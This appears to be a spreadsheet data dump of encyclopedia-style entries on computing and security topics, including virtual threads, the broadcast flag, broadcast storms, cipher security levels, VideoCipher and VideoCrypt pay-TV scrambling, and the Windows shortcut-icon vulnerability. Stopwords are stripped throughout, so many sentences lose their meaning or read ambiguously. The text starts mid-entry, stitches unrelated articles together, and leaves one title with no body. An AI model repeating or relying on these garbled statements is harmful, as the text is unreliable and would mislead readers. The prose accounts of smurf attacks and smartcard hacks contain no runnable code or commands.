threads blockedvirtual threads increase possible concurrency many orders magnitudes actual parallelism achieved limited available execution units pipelining offered present processors processor cores. 2021, consumer grade computers typically offer parallelism tens concurrent execution units. increased performance parallelism, language runtime need present hardware, single-threaded feature global synchronization global interpreter lock many magnitudes increase possible preemptive items offered virtual threads achieved language runtime managing resizable thread stacks. those stacks smaller size operating system threads. maximum number threads possible without swapping proportional amount main memoryin order support virtual threads efficiently, language runtime largely rewritten prevent blocking calls holding operating system thread assigned execute virtual thread manage thread stacks. example retrofit virtual threads java loom. example language designed virtual threads complexity because virtual threads offer parallelism, programmer needs skilled multi-threaded programming synchronization because blocked virtual thread would block thread occupies moment, much effort must taken runtime handle blocking system calls. typically, thread pool spare threads used execute blocking call virtual thread initially executing thread blocked management virtual thread stack requires care linker short predictions additional stack space requirements implementations google chrome browser virtual threads used serialize singleton input/output activities. when virtual thread executing, different thread. chrome browser first appeared 2008. chrome’s virtual threads available developers extending browser goroutines became preemptive go1.4 2014 since prominent application virtual threads. goroutine virtual thread. first appeared 2009 java project loom project loom: virtual threads lightweight user-mode scheduled alternative standard managed threads. virtual threads mapped threads many-to-many relationship. work project loom oracle started 2017. loom goal implementing virtual threads performance, time simplifying thread handling across threads, concurrent threads virtual threads. 2022, project loom available early-access using also async/await light-weight process coroutine global interpreter lock fiber (computer science) portable threads protothreads references external links massivevirtualparallelism program testing limits virtual threads</t>
  </si>
  <si>
    <t>Broadcast flag</t>
  </si>
  <si>
    <t>broadcast flag field sent data stream digital television program indicates whether data stream recorded, restrictions recorded content. possible restrictions include inability save unencrypted digital program hard disk non-volatile storage, inability make secondary copies recorded content order share archive), forceful reduction quality recording (such reducing high-definition video resolution standard tvs), inability skip commercials. united states, television receivers using atsc standard supposed incorporate functionality july 2005. requirement successfully contested 2005 rescinded 2011. ruling officially called "digital broadcast television redistribution control," fcc's rule 73.9002(b) following sections, stating part: party shall sell distribute interstate commerce covered demodulator product comply demodulator compliance requirements demodulator robustness requirements." according rule, hardware must "actively thwart" piracy. rule's demodulator compliance requirements insists hdtv demodulators must "listen" flag assume present signals). flagged content must output "protected outputs" (such hdmi ports hdcp encryption), degraded form analog outputs digital outputs visual resolution 720x480 pixels (edtv) less. flagged content recorded "authorized" methods, include tethering recordings single device. since broadcast flags could activated time, viewer often records program might suddenly find longer possible save favorite show. this reasons lead many flags direct affront consumer rights. demodulator robustness requirements difficult implement open source systems. devices must "robust" user access modifications someone could easily alter ignore broadcast flags permit access full digital stream. since open-source device drivers design user-modifiable, tuner card open-source drivers would "robust". radio project already successfully demonstrated purely software-based demodulators exist hardware rule fully enforceable. current status american library association fcc, f.3d (d.c. cir. 2005), united states court appeals d.c. circuit ruled exceeded authority creating rule. court stated commission could prohibit manufacture computer video hardware without copy-protection technology authority regulate transmissions, devices receive communications. while always possible supreme court could overturn ruling, likely reemergence broadcast flag legislation united states congress granting authority fcc. 2006, sen. stevens inserted version broadcast flag communications, consumer's choice, broadband deployment 2006. june 2006 sen. john sununu offered amendment strike broadcast radio flag, failed broadcast-flag amendment approved commerce committee. nonetheless, overall bill never passed, thus died upon adjournment 109th congress december 2006. 2008, news.com reported microsoft confirmed current versions windows media center shipping windows family operating systems adhered broadcast flag, following reports users blocked taping specific airings programs, mainly american gladiators medium. microsoft spokesperson said windows media center adheres "rules forth fcc."on august 2011, officially eliminated broadcast flag regulations. related technologies radio broadcast flag riaa with coming digital radio, recording industry attempting change ground rules copyright songs played radio. currently, (i.e. broadcast internet) radio stations play songs freely riaa wants congress insert radio broadcast flag. april 2006, congress held hearing radio broadcast flag. among witnesses musicians anita baker todd rundgren. european broadcast flag present equivalent signal typically used european transmissions, although dvb-cpcm would provide signal defined dvb-si, usable clear-to-air television broadcasts. adherence system would enforced receiver clear. introduced content protection restrictions 2010 free content licensing data necessary receive service information freeview broadcasts. however stated highest protection applied allow copy made. isdb isdb broadcasts protected allow broadcast digitally recorded once, allow digital copies recording made. analog recordings copied freely. possible disallow analog outputs, although implemented. protection circumvented correct hardware software. dvb-cpcm digital video broadcasting organization developing dvb-cpcm allows broadcasters (especially paytv broadcaster) control content (and beyond) home networks. standards commonly used europe around world (for satellite, terrestrial, cable distribution), also employed united states dish network. europe, entertainment companies lobbying legally mandate dvb-cpcm. opponents fear mandating dvb-cpcm kill independent receiver manufacturers open source operating systems (e.g., linux-based set-top boxes.) pay-per-view broadcast flag since april 2008, pay-per-view movies cable satellite television flagged prevent recording pay-per-view channel digital video recorders related devices retained hours ordered time film. this standard film industry practice, including digital rentals itunes store google play. movies recorded point would still available without flagging could copied freely, though 2015 pre-2008 units well out-of-date probably non-functional, pay-per-view concern moot special events, nearly satellite providers cable providers moved easily restricted video demand platforms; pay-per-view films drawn non-notable content. also copy control information digital millennium copyright digital rights management digital transition content security family entertainment copyright references external links copyright protection digital television: “broadcast flag” electronic frontier foundation's broadcast flag page broadcast flag "plug play": fcc's lockdown digital television u.s. district court shoots broadcast flag (cnet) broadcast flag: media industry steal june 2005 newswire article circuit court ruling striking (pdf format)</t>
  </si>
  <si>
    <t>Broadcast storm</t>
  </si>
  <si>
    <t>broadcast storm broadcast radiation accumulation broadcast multicast traffic computer network. extreme amounts broadcast traffic constitute "broadcast storm". consume sufficient network resources render network unable transport normal traffic. packet induces storm occasionally nicknamed chernobyl packet. causes most commonly cause switching loop ethernet network topology (i.e. paths exist switches). broadcasts multicasts forwarded switches every port, switch switches repeatedly rebroadcast broadcast messages flood network. since layer-2 header support time live (ttl) value, frame sent looped topology, loop forever. cases, broadcast storm instigated purpose denial service (dos) using packet amplification attacks, smurf attack fraggle attack, attacker sends large amount icmp echo requests (ping) traffic broadcast address, icmp echo packet containing spoof source address victim host. when spoofed packet arrives destination network, hosts network reply spoofed address. initial echo request multiplied number hosts network. this generates storm replies victim host tying network bandwidth, using resources possibly crashing victim.in wireless networks disassociation packet spoofed source wireless access point sent broadcast address generate disassociation broadcast attack. prevention switching loops largely addressed link aggregation, shortest path bridging spanning tree protocol. metro ethernet rings prevented using ethernet ring protection switching (erps) ethernet automatic protection system (eaps) protocols. filtering broadcasts layer equipment, typically routers (and even switches employ advanced filtering called brouters). physically segmenting broadcast domains using routers layer logically vlans layer fashion switches decrease size collision domains layer routers firewalls configured detect prevent maliciously inducted broadcast storms (e.g. magnification attack). broadcast storm control feature many managed switches switch intentionally ceases forward broadcast traffic bandwidth consumed incoming broadcast frames exceeds designated threshold. although resolve root broadcast storm problem, limits broadcast storm intensity thus allows network manager communicate network equipment diagnose resolve root problem. manet broadcast storms mobile network (manet), route request (rreq) packets usually broadcast discover routes. these rreq packets cause broadcast storms compete channel data packets. approach alleviate broadcast storm problem inhibit hosts rebroadcasting reduce redundancy, thus contention collision. references</t>
  </si>
  <si>
    <t>Broken cipher</t>
  </si>
  <si>
    <t>cryptography, security level measure strength cryptographic primitive cipher hash function achieves. security level usually expressed "bits", n-bit security means attacker would perform operations break methods proposed closely model costs attacker. this allows convenient comparison algorithms useful combining multiple primitives hybrid cryptosystem, clear weakest link. example, aes-128 (key size bits) designed offer 128-bit security level, considered roughly equivalent using 3072-bit key. context, security claim target security level security level primitive initially designed achieve, although "security level" also sometimes used contexts. when attacks found lower cost security claim, primitive considered broken. symmetric cryptography symmetric algorithms usually strictly defined security claim. symmetric ciphers, typically equal size cipher equivalent complexity brute-force attack. cryptographic hash functions output size bits usually collision resistance security level preimage resistance level this general birthday attack always find collisions 2n/2 steps. example, sha-256 offers 128-bit collision resistance 256-bit preimage resistance. however, exceptions this. phelix helix 256-bit ciphers offering 128-bit security level. shake variants sha-3 also different: 256-bit output size, shake-128 provides 128-bit security level collision preimage resistance. asymmetric cryptography design asymmetric algorithms (i.e. public-key cryptography) relies neat mathematical problems efficient compute direction, inefficient reverse attacker. however, attacks current public-key systems always faster brute-force search space. their security level design time, represents computational hardness assumption, adjusted match best currently known attack.various recommendations published estimate security level asymmetric algorithms, differ slightly different methodologies. cryptosystem 128-bit security level, nist enisa recommend using 3072-bit keys ietf 3253 bits. elliptic curve cryptography requires shorter keys, recommendations 256-383 (nist), (enisa) bits (ietf). typical levels following table examples typical security levels types algorithms found s5.6.1.1 nist sp-800-57 recommendation management. deprecated 2003 meaning "broken" cryptographic primitive considered broken attack found less advertised level security. however, attacks practical: currently demonstrated attacks take fewer operations, translates hours average costliest demonstrated attack hash functions 261.2 attack sha-1, took months gpus, us$1,100.aumasson draws line practical impractical attacks operations. proposes terminology: broken primitive attack taking operations. attack plausibility carried out. wounded primitive attack taking around 2100 operations. attack possible right now, future improvements likely make possible. attacked primitive attack cheaper security claim, much costlier 2100. such attack practical. finally, analyzed primitive attacks cheaper security claim. references further reading aumasson, jean-philippe (2020). much crypto (pdf). real world crypto symposium. also computational hardness assumption 40-bit encryption cipher security summary hash function security summary</t>
  </si>
  <si>
    <t>Broken hash function</t>
  </si>
  <si>
    <t>Virtual tape library</t>
  </si>
  <si>
    <t>virtual tape library (vtl) data storage virtualization technology used typically backup recovery purposes. presents storage component (usually hard disk storage) tape libraries tape drives existing backup software. virtualizing disk storage tape allows integration vtls existing backup software existing backup recovery processes policies. benefits virtualization include storage consolidation faster data restore processes. mainframe data centers, storage capacity varies, however protecting business mission critical data always vital. most current solutions sata disk arrays primary storage component relatively cost. array enclosures increases scalability solution allowing addition disk drives enclosures increase storage capacity. shift also eliminates streaming problems often impair efficiency tape drives disk technology rely streaming write effectively regardless data transfer speeds. backing data disks instead tapes, often increases performance backup recovery operations. restore processes found faster backup regardless implementations. cases, data stored vtl's disk array exported media, physical tapes, disaster recovery purposes (scheme called disk-to-disk-to-tape, d2d2t). alternatively, contemporary backup software products introduced also direct usage file system storage (especially network-attached storage, accessed cifs protocols networks) requiring tape library emulation all. they also often offer disk staging feature: moving data disk physical tape long-term storage. while virtual tape library fast, disk storage within designed removable, usually involve physically removable external disk drives used data archiving place tape. since disk storage always connected power data sources never physically electrically isolated, vulnerable potential damage corruption nearby building power grid lightning strikes. history first solution introduced cybernetics 1992 name hstc (high speed tape cache). later, released virtual tape server (vts) introduced 1997. targeted mainframe market, many legacy applications tend short tape volumes. used escon interface, acted disk cache 3494 tape library. competitive offering storagetek (acquired 2005 microsystems, subsequently oracle corporation) known virtual storage manager (vsm) leveraged market dominant powderhorn library back store. each product line enhanced support larger disk buffer capacities, ficon, recently 2010) "tapeless" disk-only environments. other offerings mainframe space also "tapeless". developed corporation, luminex gained popularity wide acceptance teaming data domain provide benefits data deduplication behind channel gateway platform. with consequent reduction off-site replication bandwidth afforded deduplication, possible practical form virtual tape reduce recovery point objective time recovery time objective near zero instantaneous). outside mainframe environment, tape drives libraries mostly featured scsi. likewise, vtls developed supporting popular scsi transport protocols (legacy systems), fibre channel, iscsi. falconstor foundation nearly half products sold market, according enterprise strategy group analyst.in mid-2010s vtls rebirth thanks hi-capacity "archive" drives seagate hgst popular "tape cloud" disk-to-disk-to-tape (often cloud) scenarios. amazon starwind software partnership veeam, backblaze wasabi technologies offer so-called gateway products facilitates backing archiving premises" data virtual tapes stored aws, microsoft azure, wasabi technologies backblaze public clouds. idea provide seamless integration backup applications incompatible apis object storages expose. say, time veeam can't backup deep archive tier within azure still. also backup tape library tape management system disk staging alternative approach emulation storage virtualization seven tiers disaster recovery references</t>
  </si>
  <si>
    <t>Virtual security switch</t>
  </si>
  <si>
    <t>virtual security switch software ethernet switch embedded security controls within runs within virtual environments vmware vsphere, citrix xendesktop, microsoft hyper-v virtual iron. primary purpose virtual security switch provide security measures isolation, control content inspection virtual machines. virtual machines within enterprise server environments began gain popularity 2005 quickly started become standard companies deploy servers applications. order deploy servers within virtual environment, virtual network needed formed. result, companies vmware created resource called virtual switch. purpose virtual switch provide network connectivity within virtual environment virtual machines applications could communicate within virtual network well physical network. this concept virtual network introduced number problems, related security within virtual environment, virtual switching technology within environment security technologies. unlike physical networks switches access control lists (acls), firewalls, antivirus gateways, intrusion prevention devices, virtual network wide open. virtual security switch concept switching security joined forces, security controls could placed within virtual switch provide per-port inspection isolation within virtual environment. this concept allowed security close possible points intends protect, without reside points (host-based virtual machines) themselves. eliminating need deploy host-based security solutions virtual machines, significant performance improvement achieved deploying security within virtual environment. this virtual machines share computing resources (e.g. time, memory disk space) physical servers dedicated resources. understanding this, picture virtual machines running dual-cpu server virtual server host-based firewall running them. this would make firewalls using resources virtual machines using. this defeats purpose virtualization, apply resources virtual servers security applications. deploying security centrally within virtual environment sense firewall versus firewalls. limitations because switches layer devices create single broadcast domain, virtual security switches alone cannot fully replicate network segmentation isolation typically employed multi-tiered physical network. address limitation, number networking, security virtualization vendors begun offer virtual firewalls, virtual routers network devices allow virtual networks offer robust security network organization solutions. problem example because virtual machines essentially operating systems applications packaged single file (called disk images), become mobile. first time history, servers moved around, exchanged shared like files shared peer-to-peer networks. administrators download pre-installed virtual servers internet speed deployment time servers. longer required administrator lengthy software installation process, virtual disk images pre-installed operating systems applications. they virtual appliances. this mobility server images created potential problem entire servers become infected passed around wild. imagine downloading latest fedora linux server site like thoughtpolice.co.uk, installing later learning trojan horse server later took virtual network. this could catastrophic. while trust factor needs taken account downloading virtual server images, virtual security switch concept monitors trust decision providing isolation security monitoring virtual machines. virtual security switch isolate vm’s other, restrict types communication allowed well monitor spread malicious content denial service attacks. history reflex security introduced industry’s first gigabit network security switch port density support physical servers connected 2008, vyatta began ship open source network operating system designed offer layer services routing, firewall, network address translation (nat), dynamic host configuration virtual private network (vpn) within hypervisors. since then, vmware, cisco, juniper others shipped virtual networking security products incorporate layer layer switching routing. references further reading handy, alex 2012). "virtualization: machines anymore". times. media. "making products more secure". vmware.com. vmware. retrieved july 2016. greene, january 2008). "options seen lacking firewall virtual server protection". network world. idg.</t>
  </si>
  <si>
    <t>Bring your own encryption</t>
  </si>
  <si>
    <t>bring encryption (byoe) also known bring (byok) cloud computing security marketing model aims help cloud service customers encryption software manage encryption keys. byoe allows cloud service customers virtualized example encryption software together business applications hosting cloud, order encrypt data. business applications hosted data processed encryption software, writes ciphertext version data cloud service provider's physical data store, readily decrypts ciphertext data upon retrieval requests. this gives enterprise perceived control keys producing master relying internal hardware security modules (hsm) transmitted within cloud. data owners believe data secured master lies enterprise's cloud service provider's. when data longer needed (i.e. cloud users choose abandon cloud service), keys simply deleted. that practice called crypto-shredding. also cloud computing security encryption trust (internet security) references</t>
  </si>
  <si>
    <t>Virtual Woman</t>
  </si>
  <si>
    <t>virtual woman software program elements chatbot, virtual reality, artificial intelligence, video game, virtual human. claims oldest form virtual life existence, distributed since late 1980s. recent releases program update intelligence connecting online downloading newer personalities histories. program play when virtual woman starts, user presented list options choose virtual woman's ethnic type, personality, location, clothing, etc. load pre-built virtual woman digital file. once options determined, user presented animated virtual woman selection engage conversation, progressing manner similar predecessor, eliza successors, chatbots. versions virtual woman, done keyboard, versions also support voice input. popular culture virtual woman's current publishing company, cyberpunk software, claims half million copies virtual woman existence. software sales usage statistics private companies difficult verify. winsite, independent internet shareware distribution site publish public download counts, time listed version virtual woman three shareware downloads time well seven hundred thousand downloads.the washington post reported april 2007 bank security guards distracted duties playing virtual woman tried cover fact allowed us$52,000 stolen. bank manager refused whether would fired, say, think getting promoted." compadre group beta testers advisers virtual woman referred compadre beta testing site forum. criticisms virtual woman developed ability conduct longer realistic interactions, particularly recent beta releases, criticism arisen lead users social isolation, program substitute real human interaction. however, criticisms leveled video games internet itself. company representative, nancy, indirectly responded accusations interview news reporter mike martinez 1998 stating virtual woman played valuable role allowing form social interactions people normally able take part them. cited user wrote thank program relieved boredom isolation recovering crippling accident hospital. release history versions virtual woman rough release dates platforms designed: virtual woman (????) (dos) virtual woman windows (1991) (windows 3.0) virtual woman (1995) (windows windows virtual woman (1998) (windows windows virtual woman 2000 (2000) (windows 95+) virtual woman millennium (windows virtual woman windows xp/vista specific) notes external links virtual woman official website</t>
  </si>
  <si>
    <t>Virtual Processor</t>
  </si>
  <si>
    <t>virtual processor (vp) virtual machine group. history first version, vp1, basis parallel processing multimedia platform, taos. supported risc-like instruction 32-bit registers, data types 64-bit integers 64-bit ieee floating point numbers registers, also supported 16-bit integers memory. second version, vp2, released 1998 basis version portable multimedia platform, first known elate intent. supported data types data processing operations vp1, additional features better support high level languages demarcation subroutines, by-value parameters, large theoretical maximum number registers local subroutine local variables. structure vpcode, virtual processor's machine code, intended able represent constructs required compiling languages java, allow efficient translation machine code real 64-bit cpu. references independent 1990 byte march 1991 parallelogram april 1991 ieee 1992 sure what byte july 1994 edge june 1994 computing awards gold 1994 acorn user 1995 osnews interview intent</t>
  </si>
  <si>
    <t>C-list (computer security)</t>
  </si>
  <si>
    <t>capability-based computer security, c-list array capabilities, usually associated process maintained kernel. program running process manipulate capabilities directly, refers c-list indexes—integers indexing c-list. file descriptor table unix example c-list. unix processes manipulate file descriptors directly, refer file descriptor numbers, c-list indexes. keykos eros operating systems, process's capability registers constitute c-list. also access control list references</t>
  </si>
  <si>
    <t>CLEFIA</t>
  </si>
  <si>
    <t>clefia proprietary block cipher algorithm, developed sony. name derived french word clef, meaning "key". block size bits size bit, bit. intended used systems. among cryptographic techniques recommended candidate japanese government cryptrec revision 2013. standardization clefia included following standards. iso/iec 29192-2:2019, information security lightweight cryptography part block ciphers references further reading wang; xiaoyun wang december 2007). "improved impossible differential cryptanalysis clefia". retrieved october 2010. cihangir tezcan august 2010). "the improbable differential attack: cryptanalysis reduced round clefia". retrieved october 2010. external links clefia website 256bit ciphers clefia reference implementation derived code sony introduces clefia implementation 128-bit clefia codec hash function</t>
  </si>
  <si>
    <t>Videocipher</t>
  </si>
  <si>
    <t>videocipher brand name analog scrambling de-scrambling equipment cable satellite television invented primarily enforce television receive-only (tvro) satellite equipment receive programming subscription basis.the second version videocipher, videocipher primary encryption scheme used major cable programmers prevent tvro owners receiving free terrestrial television programming. especially notable widespread compromise encryption scheme. background satellite providers though first half 1980s, hbo, cinemax premium television providers analog satellite transponders faced fast growing market tvro equipment owners. satellite television consumers could watch services simply pointing dish satellite, tuning provider's transponder. open questions existed practice: whether communications 1934 applied case "unauthorized reception" tvro consumers; extent legal service provider encrypt signals effort prevent reception. cable communications policy 1984 clarified matters, making following legal: reception unencrypted satellite signals consumer reception encrypted satellite signals consumer, received authorization legally decrypt itthis created framework wide deployment encryption analog satellite signals. created framework (and implicit mandate provide) subscription services tvro consumers allow legal decryption signals. cinemax became first services announce intent encrypt satellite feeds late 1984. videocipher technology videocipher invented 1983 linkabit corporation (later bought m/a-com 1985, operated m/a-com linkabit). 1980s, m/a-com began divesting divisions fell outside core microwave component subsystem products. linkabit division acquired general instrument 1987. videocipher used throughout 1990s rcti sctv encrypt foreign programs (such sports events movies) part term rights, prevent overseas access programs could accessed rcti sctv networks uhf/vhf frequency indonesia. indovision also used videocipher encrypt channels counteract piracy 1994 1997. variants there several variants videocipher scrambling system: videocipher this first version videocipher system first demonstrated linkabit 1983. also known videocipher variation videocipher commonly used sports backhauls. used system 1987 mid-1990s encrypt transmissions affiliates telstar telstar satellites. canada, television network also used technology network feeds. with system video scrambled means re-ordering video scan lines, audio remains clear. this system late early 2000s. videocipher (vci) system initially considered 1980s. tested extensively, ultimately rejected favor videocipher hbo's would required descramblers home satellite viewers. costs involved vc1, maintaining descrambler determined expensive consumer use. used videocipher satellite feeds member stations mid-80s take advantage high-fidelity digital audio capability offered vci. this desirable programming would era, classical concerts musical programming, simulcast partnering public radio stations using audio feed. attempted 1979 send program audio digitally member stations using system called date (digital audio television), used existing analog video's vertical blanking interval (vbi) send digital audio. provided feature freeing purposes like closed-captioning teletext, making date obsolete mid-1980s (however, date offer channels audio opposed videocipher 2-channel stereo). leitch viewguard scrambling system used satellite feeds well used video line re-ordering well, also leaving audio intact. used viewguard well analog network feeds affiliate stations shortly switching digital satellite distribution 2005 (for abc) 2004 (for fox). videocipher videocipher first consumer tvro scrambling system. cinemax, transponders satcom galaxy began encrypting west coast feeds services videocipher hours early 1985, east coast feeds august. networks began scrambling full time january 1986, many contemporary news reports called "s-day". within years, encryption videocipher used majority major cable television programmers. however, lapses security enabled pirate decryption, modifying consumer descrambler receive free programming. beginning 1991, programmers began phase vcii system favor secure videocipher plus (rs) system. system fully phased 1993. originally sold stand-alone decoder consisted fully electronic decoder descrambler module, satellite system manufacturers began make receivers descrambler module installed. this vcii system digitally encrypts stereo audio using encryption scheme scrambles video inverting video polarity moving color information nonstandard area frequency. noteworthy videocipher plus design alter video scrambling scheme (only audio encryption improved). such, videocipher decoder still capable decoding video portion videocipher plus encrypted stream. late eighties early nineties, videocipher modules pirated, began receive constant electronic counter measures (ecm).in early nineties, programmers increased frequency tier keys monthly near daily. companies (such magna systems) began offering services whereby users could continue receive keys electronic modifications/add-on boards "vms" modems. these add-on modem modules would dial bulletin board system automatically download required keys view available programming. eventually (about 1992), completely left videocipher datastream favor secure videocipher plus (rs) datastream; programmers followed suit. having videocipher module longer worth anything unless viewer wanted watch adult programming without audio. time, local cable providers pass encrypted audio subscribers. such, viewers cable satellite found marry audio video. viewers found audio cable line video satellite videocipher push vcrs tvs. advanced videocipher plus datastream, video could appear "flicker" struggle videocipher module (modules newer "pirate chip" installed, tended less prone issue). videocipher subject itar restrictions export cryptography united states des, exception consumer descramblers added munitions list 1992. videocipher ii+/rs 1992, following years security breaches videocipher system, general instruments introduced videocipher plus descrambler module. 1993, vcii programming phased out, especially premium movie channels view. time, many networks, like sportschannel america, remained stream. videocipher higher-security system variants. videocipher-rs system renewable security) videocipher plus system slot back descrambler module card could inserted upgrade security vcii plus system ever breached. technological obsolescence general instrument discontinued production modules 1998 favor digicipher system. over next years, broadcasters migrated digital transmission delivery discontinued analog feeds. october 2008, motorola (who acquired general instruments january 2000) announced authorization center would longer authorize decoders december 2008, current remaining analog videocipher channels would switch entirely digital transmission date. weather channel, last major television network utilize videocipher system, discontinued analog signal transponder june 2014, effectively ending videocipher era. legacy within years change signal scrambling vcii+, directv began take many former band videocipher subscribers illegal receivers programming. many involved providing illegal videocipher programming moved hacking providing users illegal access time) based mpeg-2 digital satellite subscription service. also television encryption references</t>
  </si>
  <si>
    <t>CONDOR secure cell phone</t>
  </si>
  <si>
    <t>project "condor" project development secure mobile phones. also secure communications interoperability protocol sectéra secure module motorola cell phones references</t>
  </si>
  <si>
    <t>VideoCrypt</t>
  </si>
  <si>
    <t>videocrypt cryptographic, smartcard-based conditional access television encryption system scrambles analogue pay-tv signals. introduced 1989 news datacom used initially subsequently several broadcasters ses' astra satellites 19.2° east. users versions three variants videocrypt system deployed europe: videocrypt irish market videocrypt continental europe. third variant, videocrypt-s used short-lived select service. videocrypt-s system differed typical videocrypt implementation used line shuffle scrambling. fiji different versions videocrypt standard. used nicam stereo many years abandoning technology started replacing uhf. operating principle system scrambles picture using technique known "line cut-and-rotate". each line made picture (video frame) possible "cut points", halves line swapped around transmission. series cutpoints determined pseudo-random sequence. channels decoded using pseudorandom number generator (prng) sequence stored smart card (aka viewing card). decode channel decoder would read smart card check card authorised specific channel. not, message would appear screen. otherwise decoder seeds card's prng seed transmitted video signal generate correct sequence points. system also included cryptographic element called fiat shamir zero knowledge test. this element routine smartcard would prove decoder card indeed genuine card. basic model decoder would present card packet data (the question challenge) card would process effectively return result (the answer) decoder proving genuine card without disclosing critical information. decoder received wrong result card, supposed stop decoding video. however technologically insecure implementation otherwise strong cryptographic element made redundant. videocrypt-s variant, used select service, based line shuffle scrambling. this form video scrambling changes order lines transmitted thus line transmitted line videocrypt-s variant used blocks forty seven lines field. three scrambling formats: full shuffle lines affected; half shuffle, every alternate field scrambled; line delay scramble start position video line pseudo-randomly delayed. chose line shuffle scrambling rather line cut-and-rotate tests shown line cut-and-rotate susceptible picture degradation exposed ghosting co-channel interference conditions commonly present terrestrial transmissions. attacks videocrypt system secure number hacks employed. card attacks hackers discovered methods preventing killing deactivating cards. simplest attacks relied fact using eprom technology smartcards time. thus modifying decoder limit write voltage card, possible stop cards turned air. another, known kentucky fried chip attack relied replacing microcontroller controlled smartcard decoder interface. this attack relied blocking packets smartcard's identification number. voltage based attack failed changed smartcards used eeprom technology. commercial pirates completely reverse engineered smartcard, removed access control routines created working pirate smartcards using different microcontroller types (typically pic16c84) used sky. hackers also discovered (after commercial pirate code became public) ways switching "dead" cards using computer smartcard interface sending properly formatted addressed activation packet card. variations attack also allowed existing subscriber cards upgraded expensive subscription packages. this attack known "phoenix hack" mythical bird could bring back life. datastream attacks other successful hacks involved sampling datastream card decoder, example could record movie store decoder information people could decode movie recorded earlier decoder "dummy" card (the dummy smartcard interface received synchronised decryption seeds computer). attack known delayed data transfer hack worked conditional access data, decoder addressing encrypted keys, video lines recorded normal vcrs data rate, unlike teletext, slow enough allow data recorded encrypted video. decoder card datastream attacks successful hack videocrypt system "mccormac hack" devised john mccormac. this attack involved broadcasting decryption keys decoder-card data live decoders could watch encrypted channels, effectively sharing card several decoders. card sharing implementation mccormac hack. brute force desktop computing power increased, simple system always inherently vulnerable brute force 'image-processing' attacks. even without information cutpoint sequence, adjacent lines picture 'correlated' find best match, picture reconstructed. brute force method work pictures, interesting proof-of-concept. markus kuhn's antisky.c program 1994 early example attack. more recently shown that, using detailed knowledge colour transmitted analogue systems, 'perfect' reconstruction could achieved many scenes. cheap cards (~£40) particular chipsets (e.g.: brooktree) capable descrambling image near real time (sound delayed match). this made possible software moretv hvcplus reasonably fast picture quality videotape, colour distortion depending performance. references 0428252, cohen, michael hashkes, jonathan, system controlling access broadcast transmissions", published 1991-05-22, assigned news data security products ltd. john mccormac: european scrambling systems black book, waterford university press, 1996, isbn 1-873556-22-5. markus kuhn: attacks pay-tv access control systems, seminar talk slides, 1997. markus kuhn: some technical details videocrypt, 1996. markus kuhn: antisky image processing attack videocrypt, 1994. this programme reassembles videocrypt encoded stills.</t>
  </si>
  <si>
    <t>CP-67</t>
  </si>
  <si>
    <t>cp-67 control program portion cp/cms, virtual machine operating system developed system/360-67 ibm's cambridge scientific center. reimplementation earlier research system cp-40, one-off customized s/360-40. cp-67 later reimplemented (again) cp-370, released vm/370 1972, virtual memory added system/370 series. details development circumstances cp-67 found article history cp/cms. family tree</t>
  </si>
  <si>
    <t>CPLINK</t>
  </si>
  <si>
    <t>cplink win32/cpllnk.a names microsoft windows shortcut icon vulnerability discovered june 2010 patched august affected windows operating systems. vulnerability exploitable windows application display shortcut icons, windows explorer, browses folder containing malicious shortcut. exploit triggered without user interaction, regardless shortcut file located.in june 2010, virusblokada reported detection zero-day attack malware called stuxnet exploited vulnerability install rootkit snooped siemens' scada systems wincc according symantec first worm designed reprogram industrial systems them. references external links microsoft security advisory (2286198) concerning windows vulnerability exploited cplink. infoworld article stuxnet 'best' malware ever?</t>
  </si>
  <si>
    <t>CPU modes</t>
  </si>
  <si>
    <t>modes (also called processor modes, states, privilege levels names) operating modes central processing unit computer architectures place restrictions type scope operations performed certain processes cpu. this design allows operating system privileges application software. ideally, highly trusted kernel code allowed execute unrestricted mode; everything else (including non-supervisory portions operating system) runs restricted mode must system call (via interrupt) request kernel perform behalf operation could damage compromise system, making impossible untrusted programs alter damage programs computing system itself). practice, however, system calls take time hurt performance computing system, uncommon system designers allow time-critical software (especially device drivers) full kernel privileges. multiple modes implemented—allowing hypervisor multiple operating system supervisors beneath basic design many virtual machine systems available today. mode types unrestricted mode often called kernel mode, many designations exist (master mode, supervisor mode, privileged mode, etc.). restricted modes usually referred user modes, also known many names (slave mode, problem state, etc.). kernel kernel mode, perform operation allowed architecture; instruction executed, operation initiated, area memory accessed, modes, certain restrictions operations enforced hardware. typically, certain instructions permitted (especially those—including operations—that could alter global state machine), memory areas cannot accessed, etc. user-mode capabilities typically subset available kernel mode, cases, hardware emulation non-native architectures, significantly different available standard kernel mode. user some architectures support multiple user modes, often hierarchy privileges. these architectures often said ring-based security, wherein hierarchy privileges resembles concentric rings, kernel mode center. multics hardware first significant implementation ring security, many hardware platforms designed along similar lines, including intel 80286 protected mode, ia-64 well, though referred different name cases.mode protection extend resources beyond hardware itself. hardware registers track current operating mode cpu, additional virtual-memory registers, page-table entries, data track mode identifiers resources. example, operating ring indicated status word itself, every access memory additionally validated separate ring number virtual-memory segment targeted access, and/or ring number physical page any) targeted. this demonstrated handheld system. hardware meets popek goldberg virtualization requirements makes writing software efficiently support virtual machine much simpler. such system software "believes" running supervisor mode, actually running user mode. references</t>
  </si>
  <si>
    <t>Video door-phone</t>
  </si>
  <si>
    <t>video door-phone (also known video door entry video intercom) stand-alone intercom system used manage calls made entrance building (residential complex, detached family home, workplace, etc.) access controlled audiovisual communication inside outside. main feature video door entry enables person indoors identify visitor and, (and wish, engage conversation and/or open door allow access person calling. equipment video door entry consists outside indoor elements: outdoor panel outside, electronic lock release indoor monitor. outdoor panel street panel installed beside entrance door gateway incorporates different elements ready climate conditions: several pushbuttons make call (usually home apartment), micro camera adapted night vision capture image caller, microphone pick voice speaker reproduce voice occupant indoors. video door entry panel include push buttons call homes offices camera capture street scene. video entry monitor allows occupant called, talk visitor open door. installed indoors, monitor consists screen showing image person calling, microphone earpiece conversation pushbutton trigger door lock release. communication full duplex. electric door release device installed door lock operated inside building lift latch clear visitor. common equipment types there several variations basic format. addition outdoor panels pushbutton apartment, possible find others numeric keypad: case, designed large residential installations, homes identified codes. others built-in cardholders panels even small screens guide user facilitate entry people disabilities. some video entry monitors earpiece similar telephone handset, others "hands-free". other examples monitors memories store image every time someone calls door touchscreen video entry systems. classification video door phone(vdp) video door phone classified possible classification security layers level security this security layer added system community entrance. this layer given guard directly verify entry visitor community. such systems community level. level security this also known lobby security this access lobby apartment case visitor dial number flat flat owner allows access visitor lobby entrance itself. level security case visitor communicates outdoor camera front house door villa gate. technologies classification standalone standalone device used villas individual home owners. types technology standalone analog analog display camera. connected digital this digital display digital camera usually image capture video capturing ability bell pressed. case normally additional camera integration also allowed. 